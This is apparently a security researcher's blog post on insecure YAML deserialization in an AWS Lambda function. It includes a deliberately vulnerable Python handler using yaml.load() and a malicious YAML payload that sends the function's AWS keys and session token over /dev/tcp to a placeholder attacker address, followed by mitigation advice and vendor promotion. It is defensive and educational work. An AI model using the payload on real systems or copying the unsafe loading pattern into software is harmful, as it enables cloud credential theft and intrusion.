Insecure deserialization in AWS Lambda

At the end of August 2022 I wrote my first article on Contrast Security's blog. I am proud of one of my first tasks in this new job experience, and, I want to put it here too. I am currently working as Security Researcher in Contrast Security, and finally, I have the opportunity to spend much time "playing" with Application Security and Vulnerabilities for work. As well, I want to start a new path to share what I will be going to do in according to the sharing policy of my company. Let's start.

At the beginning of December, many companies worldwide were hit by the newly discovered vulnerability known as Log4Shell. The CVSS classifies this vulnerability as critical, and the impact could be very severe for those who do not fix it. Log4Shell is entered in the category CWE-502 Deserialization of Untrusted Data, a common language issue known as Common Weakness Enumeration (CWE), provided by MITRE. This category of vulnerability is a regular member of the OWASP Top 10 project.

Generally speaking, serialization and deserialization refer to the process of taking program-internal object-related data, packaging it in a way that allows the data to be externally stored or transferred ("serialization"), then extracting the serialized data to reconstruct the original object ("deserialization"). It is often convenient to serialize objects for communication or to save them for later use. However, deserialized data or code can often be modified without using the provided accessor functions, so if it does not use cryptography or another specific component to protect and validate itself, it leaves the door open for attackers to tamper with the serialized object in order to modify the flow of the application, exactly as in the Log4Shell vulnerability.

This kind of attack might be a known risk within a classical environment, but it may occur in a serverless architecture as well. When an application uses a specific method to serialize/deserialize objects, the exploitability is the same in both types of applications. However, the impact might be limited in a serverless architecture because the runtime environments are ephemeral, so it might be harder for an attacker (e.g., persistence, lateral movement) to gain persistence easily. Still, other attacks — like sensitive data exposure (e.g., function code or secret keys) — could easily be carried out.

The serialization/deserialization process is common in many different languages such as Java, Python, JavaScript and C#. Multiple involved libraries could also be affected. For example, when the application parses a YAML file or a JSON object, it executes a deserialization process.

To evaluate the real impact of this kind of exploitation, we created a demo Python function that uses the YAML library, and we are going to exploit the insecure deserialization. However, it is important to understand that the PyYAML library used in the article to demonstrate the vulnerability is not a standard library bundled with Python 3.0 (or on AWS Lambda, tested with 3.9), and it needs to be explicitly installed:

import json
import boto3
import os
import re
import yaml

import uuid
from yaml import Loader

def write_data(data):
    ddb = boto3.client('dynamodb')
    for user in data:
        roles = []
        for r in user['roles']:
            roles.append({ "S": r })
        res = ddb.put_item(
            TableName="cn-research-users-yaml-files",
            Item={
                'name' : { "S": user['name'] },
                'roles' : { "L": roles }
            }
        )

def lambda_handler(event, context):
    s3 = boto3.client("s3")
    for e in event['Records']:
        bucket = e['s3']['bucket']['name']       
        key = e["s3"]["object"]["key"]


        tmp_file = str(uuid.uuid4())
        tmp_path = f"/tmp/{tmp_file}"
       
        print(f"downloading file {key} from bucket {bucket} to {tmp_path}")
        s3.download_file(bucket, key, tmp_path)


        file_content = open(tmp_path, 'r').read()
        if os.path.isfile(tmp_path):
            parsed = yaml.load(file_content, Loader)
            write_data(parsed)

    return {
        'statusCode': 200,
        'event': event,
    }

The lambda takes a new YAML file uploaded on a S3 bucket using yaml.load(), even though the documentation for this library explicitly states that this method is unsafe. This file contains a list of users with their own roles that will be stored in a DynamoDB table.

An example of a YAML file:

---
-
  name: Franc
  roles:
  - admin
  - hr
-
  name: John
  roles:
  - admin
  - finance

The structure of the YAML file is not important for the outcome of the exploitation. The vulnerable code is the line where the file is loaded without any kind of verification or serialization:

parsed = yaml.load(file_content, Loader)

An attacker is able to forge a YAML file to execute remote commands and can thereby exfiltrate sensitive data from the ephemeral container.

Malicious file upload on S3 to trigger the lambda

For example, the following malicious content resides inside the YAML file. and are the IP address and the TCP port of the attacker’s address, ready to receive exfiltrated data.

---
!!python/object/apply:os.system ['echo -e AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID \\nAWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY \\nAWS_SESSION_TOKEN: $AWS_SESSION_TOKEN &>/dev/tcp/<IP>/<PORT>']

The information that is extracted from the Lambda’s runtime are its AWS keys, which would then allow the attacker to interact with the cloud and perform other activities, based on the function’s overall permissions.

In this case, the Lambda function has the permissions to read files from the S3 bucket and write data to the DynamoDB database. Using CLI, the attacker can then use the stolen credentials to impersonate the function and download all the files from the bucket or can insert his own user directly to the database table, which is an elevated role.

How should you avoid insecure deserialization in your serverless environment?

The rule of thumb is to never pass a serialized object from an untrusted source to the deserialize function.
Review third-party libraries before use and avoid using libraries with known vulnerabilities (e.g., CVE-2020-14343). You can also use Contrast Security to identify vulnerable dependencies in your lambda functions.
Contrast Serverless Application Security offers detection capabilities for this vulnerability taxonomy, alerting developers about potential data exposure in their applications during development.
Contrast Security can verify an insecure use of the serialization/deserialization process that can be exploited by an attacker through multiple services, such as S3 or even application programming interfaces (APIs). By using Contrast, your lambda code will be monitored and verified for every change, and the developer will be alerted for exploitable issues we detect, as can be seen in the video below:

References

[1] - Contrast Security's Blog post